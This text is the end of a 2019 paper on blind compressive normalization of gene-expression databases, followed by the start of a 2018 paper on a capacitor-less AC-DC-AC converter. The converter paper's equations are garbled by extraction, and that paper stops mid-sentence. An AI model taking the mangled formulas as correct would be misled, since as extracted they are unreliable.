recovery in Fig. 4D, which for matrix dimensions of 50×50 create measurement increments of step size 50. Notably, these do not overlap exactly with the more fine grained scale of k-sparse recovery. Recovery robustness We continue our evaluation of blind recovery in Figs. 5A and 5D with a focus on recovery robustness. In particular, we observe that for the case of non-ideal redundancies, blind bias recovery is still feasible, as shown in Fig. 5A. Accordingly, as the redundant signal increases from weak redundancies (ρ=0.7) to strong redundancies (ρ=1.0) fewer measurements are necessary to blindly recover an unknown bias matrix (see Fig. 5A). Thus, blind recovery is somewhat robust to imperfect redundancies likely found in actual high-throughput databases. In Fig. 5C we observe that lower accuracy in the form of falsely estimated redundancies (e.g., wrong pairs of correlated features or samples) are recoverable up to a certain degree. In addition, we provide a comparison with k-sparse recovery for an identical setup, where redundancy and estimation accuracy are modeled as additive noise in Y (see Fig. 5B) and shuffled measurement operator A (see Fig. 5D). Both approaches perform well in the robustness evaluation, but it is difficult to align their scales for quantitative comparison. Benchmarking In order to benchmark the developed blind recovery approach we mimic a standard research problem involving high-throughput data and compare to a widely used unsupervised normalization approach. The aim is to identify differentially expressed genes under different noise conditions at a given significance level (p=0.05). For this purpose a high-throughput database is simulated as in ‘Simulation’ (see Data Availability). It contains 30 samples with 40 measured genes (features) each and two groups of replicates that are used to determine differential expression by a standard t-test. We force accurate estimation of correlations and corresponding standard deviations, as the small database size yields poor estimates that cause the recovery to be unstable for the limited number of available measurements (see Figs. 5A, 5C). The benchmark is performed across different noise conditions: random Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.231 Figure 5 Robustness of blind and 2-sparse recovery. (A, B) As redundancy increases from weak (ρ = 0.7) to strong (ρ=1.0) less measurements are required to blindly recover the low-rank bias (rank-2, 50× 50). (C, D) As the accuracy of estimating signal redundancies from the confounded observations increases, the measurements required to blindly recover the low-rank bias (rank-2, 50×50) are reduced. The cor- responding 2-sparse recovery is simulated for additive noise in y or shuffling in A to mimic the effect of varying redundancy and estimation accuracy for the non-blind case. Full-size DOI: 10.7717/peerjcs.231/fig-5 noise derived from N(0,1), systematic noise with rank-2 as outlined in ‘Simulation’ and no noise (see Table 1). In the case of random noise, both approaches perform similarly and are unable to reverse the effect of the corruption through normalization. Thus, no differentially expressed genes are detected at the given significance level (p=0.05), which is expected. In the case of systematic noise, the blind compressive normalization (BCN) approach outperforms quantile normalization (QN) and is able to detect differential expression given the accurate estimation of correlations and corresponding standard deviations. In the case of no Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 11/16 https://peerj.com https://doi.org/10.7717/peerjcs.231/fig-5 http://dx.doi.org/10.7717/peerj-cs.231 Table 1 Comparison of blind compressive normalization (BCN) with quantile normalization (QN) and no correction (NC) of the corrupted data. Data was corrupted with random, systematic and no noise. A t-test is performed between two groups of replicates (five each) for all genes (40 in total) and the result- ing p-values are averaged. Plus (+) and minus (−) denote if the avg. p-value falls below the significance level of 0.05, where the expected avg. p-value for no noise and no correction is 2.04E–42. BCN (avg. p-value) QN (avg. p-value) NC (avg. p-value) Random Noise − 3.42E–01 − 4.17E–01 − 3.89E–01 Systematic Noise + 3.16E–02 − 1.66E–01 − 1.67E–01 No Noise + 3.01E–03 + 3.64E–26 + 2.04E–42 noise, no correction (NC) performs best, followed by the QN and BCN approach. Both approaches are able to detect differentially expressed genes for the case of no noise. Overall, this benchmark shows that the developed approach can outperform existing approaches on a standard research problem under idealized conditions. DISCUSSION A key aspect of the proposed algorithm for blind normalization of high-throughput databases is the sparsity assumption (see Introduction). By assuming that bias has a sparse structure, due to a limited number of confounding factors, the recovery problem becomes manageable and efficient optimization on manifolds can be used for recovery. The larger a high-throughput database is in size, the more effectively we can leverage the associated redundancies, since we can focus on correlations estimated with high-specificity and low-sensitivity. This is critical, as blind recovery requires a sufficient number of accurately estimated correlations. In addition, spike-in controls can provide further constraints on the bias to be recovered. These can be important sources of additional information to be leveraged by our approach, as integration through additional measurements via entry sensing is straight forward (see ‘K-sparse recovery’). But, it remains an open question how such absolute and relative constraints interact when solving the bias recovery problem (see Definition 1). For the sparsity assumption to be of use for blind normalization, two further assumptions must be satisfied. Sufficient redundancies are needed in the form of correlations found in the high-throughput database at hand. This assumption is generally satisfied, since complex systems under study, such as the cell, generally display a number of strong correlations that are detectable despite the effect of confounding factors. In addition, high-throughput databases of a certain size are likely to contain redundancies in the form of similar biological samples that can be leveraged. Finally, blind normalization is only possible if the detected correlations are sufficiently incoherent with the low-dimensional bias model. The likelihood of such incoherence is maximized if correlated features and samples exhibit standard deviations similar to those drawn from a normal distribution, such as in the presented case of k-sparse recovery (see ‘K-sparse recovery’). In the setting of blind recovery, this assumption may only be satisfied for features and not for samples, as correlated samples have generally similar standard deviations. However, when evaluating Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.231 recovery performance in simulation this does not appear to play a major role (see Figs. 4– 5). A theoretical investigation of worst case performance and recovery guarantees is still outstanding, but recent work in the field of blind deconvolution and compressed sensing is in active pursuing this question (Stöger, Jung & Krahmer, 2016). To scale the developed algorithm to current public high-throughput databases with features and samples on the order of hundred thousands respectively, the memory consumption of the underlying manifold optimization routines needs to be optimized to be efficient on the scale of gigabytes. However, the manifold optimization routines leveraged in our proof-of-concept implementation are not able to exploit the advantages that come with sparse measurement operators, e.g., a low-memory footprint. This is due to the use of conjugate gradient methods that rely on automatic differentiation (Maclaurin, Duvenaud & Adams, 2015) and require the use of memory inefficient dense matrices. The current implementation is thus only able to handle databases on the order of hundreds of features and samples respectively. Hence, an application outside of the scope of the conducted simulations is currently not feasible and should be addressed in future work. However, there appears to be no theoretical limitation that would preclude the development of a memory efficient implementation. This is important, since the proposed approach increases in effectiveness as database size grows and thereby allows the leveraging of more redundancies (see Fig. 4B). An additional challenge exists when using fixed rank constraints in matrix recovery problems, as is the case for the employed manifold optimization routines. The fixed rank of the to be recovered low-rank matrix is generally not known a priori. Thus, optimization routines need to be run multiple times for different rank parameters in order to determine the optimal rank. This is an inefficient scheme when contrasted to recovery methods based on nuclear norm regularization (Mazumder, Hastie & Tibshirani, 2010). Furthermore, inappropriate choices of the rank parameter can result in ill-conditioned matrices for which manifold optimization routines may converge slowly. To address these challenges, a pursuit type scheme has been developed recently that can be understood as a warm start technique (Tan et al., 2014). CONCLUSION Blind compressive normalization is a systematic approach to the blind normalization of unknown confounding factors in public high-throughput databases. The presented proof-of-concept shows that such an approach is possible under reasonable assumptions. Further work in this direction has the potential to address long standing challenges in high-throughput data integration that are becoming increasingly important. ACKNOWLEDGEMENTS We thank Bence Mélykúti for comments that improved the manuscript. Melanie Boerries and Hauke Bush are designated equal last authors due to a shared research group at the time of this work. Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.231 ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by LungSys (BMBF #0316042G) and GerontoSys (BMBF #0315576D). Hauke Busch was supported through the DFG Excellence Cluster EXC306. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: LungSys: BMBF #0316042G. GerontoSys: BMBF #0315576D. DFG Excellence Cluster: EXC306. Competing Interests The authors declare there are no competing interests. Author Contributions • Sebastian Ohse conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Melanie Boerries and Hauke Busch analyzed the data, contributed reagents/materials/- analysis tools, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Source code is available at GitHub: https://github.com/a378ec99/bcn. Supplemental data is available at https://github.com/a378ec99/bcn/blob/master/ resource/supplementary_data.zip. REFERENCES Allen GI, Tibshirani R. 2012. Inference with transposable data: modelling the effects of row and column correlations. Journal of the Royal Statistical Society: Series B (Statistical Methodology) 74(4):721–743 DOI 10.1111/j.1467-9868.2011.01027.x. Barrett T, Wilhite SE, Ledoux P, Evangelista C, Kim IF, Tomashevsky M, Mar- shall KA, Phillippy KH, Sherman PM, Holko M, Yefanov A, Lee H, Zhang N, Robertson CL, Serova N, Davis S, Soboleva A. 2013. NCBI GEO: archive for functional genomics data sets—update. Nucleic Acids Research 41(D1):D991–D995 DOI 10.1093/nar/gks1193. Benito M, Parker J, Du Q, Wu J, Xiang D, Perou CM, Marron JS. 2004. Adjust- ment of systematic microarray data biases. Bioinformatics 20(1):105–114 DOI 10.1093/bioinformatics/btg385. Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 14/16 https://peerj.com https://github.com/a378ec99/bcn https://github.com/a378ec99/bcn/blob/master/resource/supplementary_data.zip https://github.com/a378ec99/bcn/blob/master/resource/supplementary_data.zip http://dx.doi.org/10.1111/j.1467-9868.2011.01027.x http://dx.doi.org/10.1093/nar/gks1193 http://dx.doi.org/10.1093/bioinformatics/btg385 http://dx.doi.org/10.7717/peerj-cs.231 Bolstad BM, Irizarry RA, Åstrand M, Speed TP. 2003. A comparison of normalization methods for high density oligonucleotide array data based on variance and bias. Bioinformatics 19(2):185–193 DOI 10.1093/bioinformatics/19.2.185. Cai TT, Zhang A. 2015. ROP: Matrix recovery via rank-one projections. The Annals of Statistics 43(1):102–138 DOI 10.1214/14-AOS1267. Candes EJ, Plan Y. 2010. Matrix completion with noise. Proceedings of the IEEE 98(6):925–936 DOI 10.1109/JPROC.2009.2035722. Candes EJ, Plan Y. 2011. Tight oracle inequalities for low-rank matrix recovery from a minimal number of noisy random measurements. IEEE Transactions on Information Theory 57(4):2342–2359 DOI 10.1109/TIT.2011.2111771. Candès EJ, Wakin MB. 2008. An introduction to compressive sampling. IEEE Signal Processing Magazine 25(2):21–30 DOI 10.1109/MSP.2007.914731. Cheadle C, Vawter MP, Freed WJ, Becker KG. 2003. Analysis of microarray data using Z score transformation. The Journal of Molecular Diagnostics 5(2):73–81 DOI 10.1016/S1525-1578(10)60455-2. Friedman J, Hastie T, Tibshirani R. 2001. The elements of statistical learning. Springer series in statistics, vol. 1. Berlin: Springer. Hastie T, Tibshirani R, Wainwright M. 2015. Statistical learning with sparsity: the lasso and generalizations. Boca Raton: CRC Press. Haug K, Salek RM, Conesa P, Hastings J, De Matos P, Rijnbeek M, Mahendraker T, Williams M, Neumann S, Rocca-Serra P, Maguire E, González-Beltrán A, Sansone S-A, Griffin JL, Steinbeck C. 2012. MetaboLights—an open-access general-purpose repository for metabolomics studies and associated meta-data. Nucleic Acids Research 41:D781–D786. Huber W, Von Heydebreck A, Sültmann H., Poustka A, Vingron M. 2002. Vari- ance stabilization applied to microarray data calibration and to the quan- tification of differential expression. Bioinformatics 18(suppl 1):S96–S104 DOI 10.1093/bioinformatics/18.suppl_1.S96. Irizarry RA, Bolstad BM, Collin F, Cope LM, Hobbs B, Speed TP. 2003. Summaries of affymetrix GeneChip probe level data. Nucleic Acids Research 31(4):e15–e15. Jain P, Netrapalli P, Sanghavi S. 2013. Low-rank matrix completion using alternating minimization. In: Proceedings of the forty-fifth annual ACM symposium on theory of computing. ACM, 665–674. Johnson WE, Li C, Rabinovic A. 2007. Adjusting batch effects in microarray expression data using empirical Bayes methods. Biostatistics 8(1):118–127 DOI 10.1093/biostatistics/kxj037. Joyce AR, Palsson BØ. 2006. The model organism as a system: integrating’omics’ data sets. Nature Reviews Molecular Cell Biology 7(3):198–210 DOI 10.1038/nrm1857. Lazar C, Meganck S, Taminau J, Steenhoff D, Coletta A, Molter C, Weiss-Solís DY, Duque R, Bersini H, Nowé A. 2012. Batch effect removal methods for microarray gene expression data integration: a survey. Briefings in Bioinformatics 14:469–490. Li C, Wong WH. 2001. Model-based analysis of oligonucleotide arrays: model validation, design issues and standard error application. Genome Biology 2(8):0032.1–0032.11. Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 15/16 https://peerj.com http://dx.doi.org/10.1093/bioinformatics/19.2.185 http://dx.doi.org/10.1214/14-AOS1267 http://dx.doi.org/10.1109/JPROC.2009.2035722 http://dx.doi.org/10.1109/TIT.2011.2111771 http://dx.doi.org/10.1109/MSP.2007.914731 http://dx.doi.org/10.1016/S1525-1578(10)60455-2 http://dx.doi.org/10.1093/bioinformatics/18.suppl_1.S96 http://dx.doi.org/10.1093/biostatistics/kxj037 http://dx.doi.org/10.1038/nrm1857 http://dx.doi.org/10.7717/peerj-cs.231 Lovén J, Orlando DA, Sigova AA, Lin CY, Rahl PB, Burge CB, Levens DL, Lee TI, Young RA. 2012. Revisiting global gene expression analysis. Cell 151(3):476–482 DOI 10.1016/j.cell.2012.10.012. Maclaurin D, Duvenaud D, Adams RP. 2015. Autograd: effortless gradients in numpy. In: ICML 2015 AutoML workshop. Mazumder R, Hastie T, Tibshirani R. 2010. Spectral regularization algorithms for learning large incomplete matrices. Journal of Machine Learning Research 11(Aug):2287–2322. McCall MN, Uppal K, Jaffee HA, Zilliox MJ, Irizarry RA. 2011. The gene expres- sion barcode: leveraging public data repositories to begin cataloging the human and murine transcriptomes. Nucleic Acids Research 39(suppl 1):D1011–D1015 DOI 10.1093/nar/gkq1259. Montgomery DC. 2008. Design and analysis of experiments. New York: John Wiley & Sons. Parker HS, Corrada Bravo H, Leek JT. 2014. Removing batch effects for prediction prob- lems with frozen surrogate variable analysis. PeerJ 2:e561 DOI 10.7717/peerj.561. Seita J, Sahoo D, Rossi DJ, Bhattacharya D, Serwold T, Inlay MA, Ehrlich LI, Fathman JW, Dill DL, Weissman IL. 2012. Gene expression commons: an open platform for absolute gene expression profiling. PLOS ONE 7(7):e40321 DOI 10.1371/journal.pone.0040321. Stöger D, Jung P, Krahmer F. 2016. Blind deconvolution and compressed sensing. In: Compressed sensing theory and its applications to radar, sonar and remote sensing (CoSeRa), 2016 4th international workshop on. IEEE, 24–27. Tan M, Tsang IW, Wang L, Vandereycken B, Pan SJ. 2014. Riemannian pursuit for big matrix recovery. In: ICML, vol. 32. Beijing: JMLR.org, 1539–1547. Available at http://dl.acm.org/citation.cfm?id=3044805.3045064. Townsend J, Koep N, Weichwald S. 2016. Pymanopt: a python toolbox for optimization on manifolds using automatic differentiation. Journal of Machine Learning Research 17(137):1–5. Vandereycken B. 2013. Low-rank matrix completion by Riemannian optimization. SIAM Journal on Optimization 23(2):1214–1236 DOI 10.1137/110845768. Vizcaíno JA, Csordas A, Del Toro N, Dianes JA, Griss J, Lavidas I, Mayer G, Perez- Riverol Y, Reisinger F, Ternent T, Xu Q-W, Wang R, Hermjakob H. 2016. 2016 update of the PRIDE database and its related tools. Nucleic Acids Research 44(D1):D447–D456 DOI 10.1093/nar/gkv1145. Wagner A, Zuk O. 2015. Low-rank matrix recovery from row-and-column affine measurements. ArXiv preprint. arXiv:1505.06292. Wei K, Cai J-F, Chan TF, Leung S. 2016. Guarantees of Riemannian optimization for low rank matrix recovery. SIAM Journal on Matrix Analysis and Applications 37(3):1198–1222 DOI 10.1137/15M1050525. Zhong K, Jain P, Dhillon IS. 2015. Efficient matrix sensing using rank-1 gaussian measurements. In: International conference on algorithmic learning theory. Berlin: Springer, 3–18. Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 16/16 https://peerj.com http://dx.doi.org/10.1016/j.cell.2012.10.012 http://dx.doi.org/10.1093/nar/gkq1259 http://dx.doi.org/10.7717/peerj.561 http://dx.doi.org/10.1371/journal.pone.0040321 http://dl.acm.org/citation.cfm?id=3044805.3045064 http://dx.doi.org/10.1137/110845768 http://dx.doi.org/10.1093/nar/gkv1145 http://arXiv.org/abs/1505.06292 http://dx.doi.org/10.1137/15M1050525 http://dx.doi.org/10.7717/peerj-cs.231 work_ld3htvi4tzfudjs3yulhvpnhwu ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 77 One Novel Control Strategy for AC-DC-AC Converter Without DC Link Electrolytic Capacitor Shihong Xie School of Electrical and Information Engineering Shaanxi University of Science & Technology Xi’an, China e-mail: xierthy@126.com Yanjing Meng School of Electrical and Information Engineering Shaanxi University of Science & Technology Xi’an, China e-mail: yjm1292@163.com Abstract—A novel control strategy for ac-dc-ac converter without electrolytic capacitor is proposed to settle the disadvantage of the traditional converter caused by large electrolytic capacitors. This study is developed in four parts: first, after analyzing for the large electrolytic capacitor defect, one novel electrolytic capacitor-less converter and its control strategy are proposed; second, the efficiency of voltage conversion for the novel converter is deduced and compared with the conventional converter, third, the mathematics model of the converter is built; forth, some simulation tests are carried out to verify the performance of converter. The simulation results show that the proposed converter is valid. Keywords-Converter; Electrolytic Capacitor; Six-Pulse Voltage; Mathematic Model; Energy Feedback I. INTRODUCTION THE traditional voltage ac-dc-ac converters have been widely used in many domains. In view of filtering and energy saving, many large electrolytic capacitors are often connected to the DC link of the traditional converter. But these electrolytic capacitors have many disadvantages such as big volume, high cost and short life [1-4] . These disadvantages will result in the converter losing efficacy. So, one novel converter without electrolytic capacitor is considered as a solution for the disadvantages of the traditional converter. Numerous articles explore the solution in recent years. One topology of electrolytic capacitor-less converter was presented in [5-6]. One feed-forward compensation control scheme is applicable to resist the influence of improper input voltages in [5]. The resistance-inductance load but three- phase induction motor load tested in the article couldn’t completely verify the performances of the supposed converter. One proportional-Resonant control of a single- phase to three-phase converter without electrolytic capacitor is proposed in[6].But power of the converter with a single- phase input power source is limited in [5-6]. In [7], one energy feedback system built on amplitude and phase control Sinusoidal Pulse wide modulation(SPWM) technology was putted forward. The system could improve the control performance of energy feedback current, but employed the double quantity of electrolytic capacitors of the traditional converter. In [8], a direct ac-ac converter connected by high frequency transformer is proposed. This converter could serve as one phase or three phases energy conversion equipment. Nonetheless, the volume of the high frequency transformer restricted the largest power of this converter. On the other hand, electrolytic capacitor also exists in this converter. Contrasting to above schemes, one ac-dc-ac converter without dc link electrolytic capacitor proposed in [9-10] gets a better scheme to settle these disadvantages of the traditional converter. This converter includes two back- to-back voltage source inverters and there is only a five microfarad ceramic capacitor in its dc link. Nonetheless, the dynamic deviation of the dc link voltage reaches twenty volts that isn’t a favorable performance. In [11-12], other circuit topologies of converter without electrolytic capacitor are also proposed, but main content is to study power-decoupling of a multi-port isolated converter in [11], and the theme is to solve the high-frequency pulsating of three-phase converter in [12]. Inspired by above articles, the paper presents an electrolytic capacitor-less converter that its dc link voltage is six pulse voltage. The first content is to analyze the fundamental function of the dc link electrolytic capacitor and put the novel converter topological structure. The second content is to deduce the voltage conversion efficiency of the proposed converter. And the third is to build the model of the converter-motor system and test the performance of the system. II. THE CONVERTER WITHOUT ELECTROLYTIC CAPACITOR A. the analysis for dc link electrolytic capacitor of the traditional converter DC link electrolytic capacitors of the conventional voltage source ac-dc-ac converter have two fundamental functions. The first is voltage smoothing. The output voltage of the front-end rectifier of the converter is a pulsation dc voltage. The voltage rectified by six diodes consists of six sinusoid-heads in one power source period and contains the heavy harmonic. However, one constant dc voltage is expected to the inverter of the conventional converter. Many electrolytic capacitors can be paralleled on the dc link of the converter to smooth the pulsation dc voltage. The second function of electrolytic capacitor for the traditional converter is energy stockpiling. When instantaneous value of the input ac line voltage of the traditional converter feeding a DOI: 10.21307/ijanmc-2019-024 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 78 induction motor is larger than the value of dc link voltage, the front-end rectifier is in on work, the input power source feeds the electrolytic capacitors and load. On the contrary, the front-end rectifier is disabled and the electrolytic capacitors feeds the motor. On another condition, when the motor is reducing speeds, the stator voltages are higher than the dc link voltage and energy feeds back to the electrolytic capacitors. So, above two functions should be disposed in another new converter system in that the electrolytic capacitors are removed from the dc link of converter. B. The converter topology One novel electrolytic capacitor-less converter topology is showed in figure 1. Power-side rectifier is composed of six diodes. And the load-side inverter is composed of six insulated gate bipolar transistors(IGBT) and every IGBT is severally paralleled with a backward diode. The differences of the novel converter comparing with the traditional is that capacitor C paralleled on the dc link is a small non-polarity thin-film capacitor and every IGBT of the power-side inverter is paralleled with a resistance-capacitor protection circuit. The small capacitor is expected to absorb the peak voltage generated by switching action. Basing the purpose of the novel converter, energy from the motor can be fed back to the power grid and a dc link six-pulse voltage composing of six sinusoid-heads in one period can be maintained. The power-side inverter feeding energy back to the power grid can be controlled with a simple method. The power-side inverter will be triggered only when the dc link voltage pumped by the feedback energy is greater than the expected six-pulse value. The control principle is that the IGBT corresponding with the conductive diodes of the power-side rectifier will be triggered. For example, when the diodes of A-phase up bridge arm and B-phase down bridge arm of the power-side rectifier are conductive, the dc link voltage is equal to input line voltage UAB. If motor energy starts to feed back to capacitor C, dc link voltage will be higher than the input line voltage UAB, the above conductive two diodes will be turn-off naturally and the IGBT of A- phase up bride arm and B-phase down bridge arm of the power-side inverter will be triggered. Ua Ub Uc UA UB UC C + - Ud Figure 1. Topology of converter without electrolytic capacitor C. Voltage conversation efficiency of the novel inverter In order to analyze the output voltage of the novel converter, voltage conversation efficiency is defined as the following. o i U U  (1) In this equation, o U is the effective value of fundamental wave of the output voltage and i U is the phase voltage effective value of the three phases input voltages of the converter. The space vector pulse width modulation(SVPWM) technology can be used to enhance the voltage conversation efficiency and reduce the output voltage harmonic. Basing this technology, the triggering time of every IGBT device will be computed precisely in accordance with the instantaneous dc link voltage. Hence, the disturbance caused by the change of dc link voltage has been restrained. On the other hand, the harmonic generated by the sampling period is further reduced because the switch frequency of IGBT is higher than the frequency of input voltage. Many presented papers verify the performance of the SVPWM method[13- 14]. Space voltage vector is defined as the following. 2 a b c 2 ( ) 3 jr j r sv u u e u e   (2) In this equation, r is equal to two thirds  . If ua, ub, and uc are three-phase balanced voltages, the following equation can be acquired. jr s m m j2 m j m j 2 2 U cos( ) U cos( - ) 3 3 2 U cos( ) 3 3 U e 2 V e r t t s v t t e t e                  (3) In this equation, Um is the amplitude of the phase-voltage, Vs is the amplitude of the space voltage vector. The switching vector of the inverter up-arms is defined as (Sa,Sb,Sc). When A-phase up-arm IGBT is triggered and A- phase down-arm IGBT will be closed, Sa is equal to one. On the contrary, Sa is equal to zero. The means of Sb, and Sc are consistent with Sa. The output voltage vector of the converter can be signed vi（i=0,1,2…6,7）. v0 and v7 are two zero vectors. Another six vectors are nonzero vectors drawn in figure 2. The nonzero vectors are defined as the following. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 79 ( 1) 3 i 2 3 j i dv u e    ，（i=1,2…6） (4) In this equation, ud is the dc link voltage of the converter. The size of ud is set as the amplitude and ω1t is set as the argument of a variable in another two-phase static coordinate system named α2-β2 coordinate system. The track of ud is the envelope line shown in figure 2. In this coordinate system, zero time reference is set in the time that the amplitude of ud reaches the largest value. The angle between α1 and α2 is signed as θ, which indirectly reflexes the phase-difference of output voltage and input power source of the converter. The effective range of θ is between zero and one third π. Figure 2. Dc-link voltage and space voltage vector If the track of magneto-motive force generated by vs is rounded, the track of vs must also be rounded. The largest track of vs is the in-circle of the hexagon forming with six nonzero vectors shown in figure 2. So, the following formula can be reasoned. smax i 3 1 V 2 2 d v u  (5) In this equation, smax V is the largest amplitude of vs. But dc link voltage of the novel converter is a six-pulse voltage, and the voltage changes between 3Um/2 and m3U . So, the largest amplitude range of vs is shown as the following formula. ' m max m 3 3 U V U 2 2 2 s  (6) In this equation, the cause of the maximum amplitude changing is the phase difference between input voltage and output voltage. That is to say the cause is θ. If θ is equal to π/6, Vˊsmax will reach the maximum value. Similarly, if θ is equal to zero, Vˊsmax will reach the minimum value. So, the voltage conversation efficiency of the novel converter can be calculated by using (3) and (6) . 3 1 2   (7) In conclusion, the voltage conversation efficiency of the novel converter is influenced by the phase difference of input voltage and output voltage, but the maximum efficiency is equal to the efficiency of the traditional converter. D. Converter mathematics model When dc link voltage of the novel converter is six-pulse voltage, it will be calculated in the following equation. d A A B B C Cu k u k u k u   (8) In this equation, kA, kB and kC are the conversion function of the power-side rectifier shown in figure 1. They can be calculated by the following equation. 1, max( , , ) 0, min( , , ) max( , , ) 1, min( , , ) j A B C j A B C j A B C j A B C u u u u k u u u u u u u u u u u          (9) In this equation, j is equal to A , B ,or C . For the novel converter, when kA is equal to one, kB is equal to negative one, kC is equal to zero and vi is equal to v1 or v6 , the equivalent circuit model of converter-motor system is shown in figure 3. The equivalent circuit in other switch states can also be acquired by the same methods. o o' + - + - + - ua ub uc + - ud uA uB o + - + - + - + - ud uA uB ua ub uc o' (a) (b) Figure 3. Inverter equivalent circuit Supposing that an induction motor is fed by the novel converter. Every phase voltage can be derived from the figure 3. In figure 3(a), three phase-voltages can be computed by using the following equation. 2 3 1 3 a d b c d u u u u u         (10) International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 80 In figure 3(b), these voltages can be acquired in the following equation. 1 3 2 3 a c d b d u u u u u         (11) With the same method, three phase-voltages can be unified in one equation as the following. 2 1 1 1 2 1 3 1 1 2 a a d b b cc u S u u S Su                              (12) Math model of the novel converter can be acquired by using (9) and (12) as the following formula. (2 ) (2 ) 1 (2 ) (2 ) 3 (2 ) (2 ) (2 ) (2 ) (2 ) a A a b c B a b c b A b a c B b a c A c a b B b a cc C a b c A C b a c B C c a b C u k S S S k S S S u k S S S k S S S k S S S k S S Su k S S S u k S S S u k S S S u                                              (13) In this equation, (uA,uB,uC) is the input voltage of the converter, (ua,ub,uc) is the output voltage of the converter, (kA, kB, kC )is the conversation function of the power-side rectifier and (Sa,Sb,Sc) is the switch function of the load-side inverter. III. SIMULATION AND ANALYSIS A. Simulation of converter driving resistance-induction load Simulation system is built to verify the performance of the novel converter. The converter drives a resistance- induction load, which is consisted of a resistance and a induction. The resistance is zero point five ohm and the induction is 10 millihenry. The SVPWM technology is used to control the load-side inverter of the converter and the switch frequency of the inverter is ten thousands hertz. Input voltage of the converter is three hundred and eighty voltage. Frequency of input voltage is fifty hertz. Output voltage size is linearly acted in line with it’s the frequency. The parameter of film-capacitor is thirty three microfarad. The parameter of electrolytic capacitor of the traditional converter is four thousands and seven hundreds microfarad, which is developed by the target that wave voltage are less than five percent. Simulation software is Matlab R2014a. Simulation algorithm is ode23tb and maximum step is ten microsecond. θ showed in figure 2 is one-sixth π. 0 0.005 0.01 0.015 0.02 400 450 500 550 U d / v o lt (a) time /s 0 0.005 0.01 0.015 0.02 400 450 500 550 U d / v o lt (b) time /s Figure 4. Contrast of dc-link voltage of two converters with resistance- inductance load The simulation results are shown in figure 4 and table 1. Figure 4(a) is the dc link voltage of the novel converter. Corresponding to figure 4(a), figure 4(b) is the voltage of the traditional converter. When the frequency of output voltage changes from five hertz to fifteen hertz, thirty hertz and fifty hertz, the effective values of output voltage fundament component, the harmonic sizes and the maximum conversation efficiency are shown in table 1. TABLE I. PERFORMANCE CONTRAST OF TWO CONVERTER WITH SAME LOAD OF RESISTANCE AND INDUCTANCE Item Frequency New converter Traditional converter THD 5 Hz 31.1 30.8 15Hz 11.1 11.2 25 Hz 8.1 6.9 50 Hz 0.8 4.0 Uab(V） 5 Hz 40.1 42 15Hz 115 119.2 25 Hz 189.8 196.8 50 Hz 380.9 366.5 η 50 Hz 1.0 0.96 B. Simulation of converter driving induction motor In order to further test the performance of the novel converter, an induction motor is driven by the novel converter and the traditional converter. Vector control technology is employed in this converter-motor system. A break resistance is paralleled on dc link of the traditional converter. The parameters of two converters and simulation condition are identical as the previous. Simulation results are shown in figure5-7 and table 2. Figure 5 shows the speed response of a motor fed by above two converters. Figure 6 shows the dc link voltage of above two converters. Figure 7 shows the electromagnetic torque responses. When the frequency of the output voltage changes from five hertz to fifteen Hertz, twenty five hertz and fifty hertz, the effective values of the output voltage fundament component, the harmonic sizes and the maximum conversation efficiency are shown in table 2. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 81 0 0.1 0.2 0.3 0.4 0.5 0 500 1000 1500 R o to r s p e e d /r p m time /s Figure 5. Contrast of speeds of a motor fed by two converters with vector control (a) (b) Figure 6. The dc link voltages of two converters with a motor load. (a) the novel. (b) the traditonal 0 0.05 0.1 0.15 0.2 -400 -200 0 200 400 600 t/s Is a /A novel converter traditional converter Figure 7. Stator current response of induction motor starting process TABLE II. PERFORMANCE CONTRAST OF TWO CONVERTERS WITH A MOTOR LOAD Item frequency New converter Traditional converter THD (%) 5 Hz 19.4 14.6 15Hz 11.2 6.97 25 Hz 6.73 6.2 50 Hz 37.7 3.5 Uab (V） 5 Hz 41.5 40.3 15Hz 118.1 117.1 25 Hz 194.1 189.4 50 Hz 386.8 385.4 η 50 Hz 1.02 1.01 C. Simulation tests about mathematic model Some tests based on the mathematics model are intended to verify the veracity of the mathematical model of the novel converter. On the contrast, another tests based on the novel converter are further implemented, which is built by SimPowersystem toolbox. Testing condition is same. Simulation results are shown in figure 8 and table 3. Figure 8(a) is the output line-voltage of the converter basing on the topology. On the contrast, figure 8(b) is the output line voltage of the converter based on mathematics model. Fundamental wave effective value along with harmonic of output line voltage is shown as table 3. 0 0.005 0.01 0.015 0.02 0.025 0.03 -500 0 500 U d/ vo lt (a) t/sec 0 0.005 0.01 0.015 0.02 0.025 0.03 -500 0 500 U ab /v ol t (b) t/sec Figure 8. Output voltage of two models of converter. (a) The mathematical model. (b) the novel converter TABLE III. HARMONIC OF OUTPUT VOLTAGE OF CONVERTER Item frequency Basing on the mathematic model Basing the topology THD( %) 10 Hz 2.8 1.79 25 Hz 0.94 0.49 50 Hz 0.2 0.22 Uo 10 Hz 76.37 76.09 25 Hz 190.1 190.5 50 Hz 379.6 379.8 D. The results analyzing Figure 4 shows that the voltages on dc link fit the expected voltages for two converters. Figure 4(a) demonstrates that the dc link voltage of the novel converter is six-pulse wave voltage. Figure 4(b) demonstrates that the dc link voltage of the traditional converter is an approximately constant dc voltage, whose ripple is less than five percent. Figure 5 shows that the rotor speed performance of an induction motor fed by the novel 